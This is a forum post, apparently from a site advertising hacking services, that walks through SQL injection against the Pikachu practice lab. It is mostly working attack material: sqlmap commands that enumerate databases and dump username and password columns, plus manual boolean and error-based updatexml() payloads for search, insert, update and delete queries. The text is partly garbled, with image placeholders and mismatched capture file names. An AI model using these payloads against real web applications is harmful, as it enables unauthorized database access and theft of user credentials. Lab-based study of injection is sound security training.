Jump to content

Title: sqlmap injection series (advanced article)

HireHackking

By HireHackking in HACKER

· 1 view

Foreword:

Software: Burpsqlmap software configuration

Set the proxy

Open the Firefox browser that comes with kali Click Settings --Network Settings

Vulnerable environment installation

Digital Injection (post)

Use burp to catch the package and save the file in the package as 33.txt 请输入图片描述

Explode the database

sqlmap -r '/root/22.txt' --dbs 请输入图片描述

Exploded Table

sqlmap -r '22.txt' -D lou --tables 请输入图片描述

Explode the table structure

sqlmap -r '22.txt' -D lou -T users --columns 请输入图片描述

Explode table data

sqlmap -r '/root/33.txt' -D kalibc -T users -C 'username,password' --dump 请输入图片描述

Video

Character injection

Open character injection in Pikachu 请输入图片描述

Character injection

The principle of character injection is ‘false’ or true#’ is always true

Connect to the database, enter select * id,email from member where id=‘KOBE’

Will output the email of the KOBE account

So, we can imagine that if we enter a piece of character in the input box and make it reasonably spliced into SQL, can we perform the traversal?

We enter kali’ or 1=1# in the input box (the first single quote is spliced with the original sql and comment out the original 'after #')

请输入图片描述

sqlmap injection (search type) injection

Verify whether there is injection

We directly enter a character k and click to search.

No exception is seen

We enter the keyword %k%

The effects are as follows:

QQ screenshot 20190404110711.png

At this point, we can conclude that there is a search-type injection vulnerability

Attack method one

Use burp to capture the package and save the file in the package as 22.txt

Put 22.txt into the root directory of sqlmap sweat.png /usr/share/sqlmap

Explode the database

sqlmap -r '22.txt' --dbs 请输入图片描述

Method 2

No need to catch the package and save the file, execute the command directly

sqlmap -u http://192.168.123.129/vul/sqli/sqli_search.php? --data 'name=*submit=%E6%90%9C%E7%B4%A2' --dbs analysis: SQL's fuzzy query command select * from table name where field name like '% (corresponding value)%'; it is found that the splicing of universal statements can be realized according to the previous idea.

Write the splicing statement as '%xxxx%'or 1=1 #%' Back to the pikachu platform to try 请输入图片描述

xx-type injection

Since the XX type is only the SQL splicing method is different, the result is directly placed here. xx')or 1=1# 请输入图片描述

sql update/insert/dele injection

About update insert statement

update database update statement

insert database insert statement

First open the registration page

We fill in the data, click Submit and grab the package.请输入图片描述

Right-click Send To Repeater Change the value of field name to kali' or updatexml(1,concat(0x7e,database()),0) or'

Click go to directly reveal the database name.

Right now! The statement changed should be: username=kali' or updatexml(1,concat(0x7e,database()),0) or'password=123456sex=phonenum=185673951111email=add=submit=submit 请输入图片描述

Get the table name

The name value is ' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='new' limit 0,1)),0) or'

username=' or updatexml(2,concat(0x7e,(select table_name from information_schema.tables where table_schema='new' limit 3,1)),0) or'password=123456sex=phonenum=185673951111email=add=submit=submit 请输入图片描述

Get column

kali' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1)),0) or' 请输入图片描述

Get content

username=kali' or updatexml(1,concat(0x7e,(select concat_ws(':', username, password) from users limit 0,1)),0) or'password=123456sex=phonenum=185673951111email=add=submit=submit 请输入图片描述

update injection

Log in first 请输入图片描述

Click to modify to capture the package 请输入图片描述

Explode the database

kali'or updatexml(2,concat(0x7e,(database())),0) or' 请输入图片描述

For other purposes, please refer to the syntax mentioned above.

delete injection

Let's leave a message first

Then find the delete connection 请输入图片描述

The database version of the burst

or updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

Execute http://127.0.0.1:8888/vul/sqli/sqli_del.php?id=56%20or%20updatexml(1,concat(0x7e,(SELECT%20@@version),0x7e),1) 请输入图片描述

Successfully obtained the version burst database: or updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) burst table: or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='lou' limit 0,1)),0) or '' Column name: or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),0) or ''

HTTP Header Injection

Sometimes, backend developers verify client header information (such as commonly used cookie verification)

Or obtain some information from the client through the http header header information, such as useragent, accept field, etc.

The client's http header information will be retrieved and processed using SQL. If there is no sufficient security consideration at this time

This may result in a SQL Inject vulnerability based on http header.

  • 0 Comments

    Recommended Comments

    There are no comments to display.

    Guest
    Add a comment...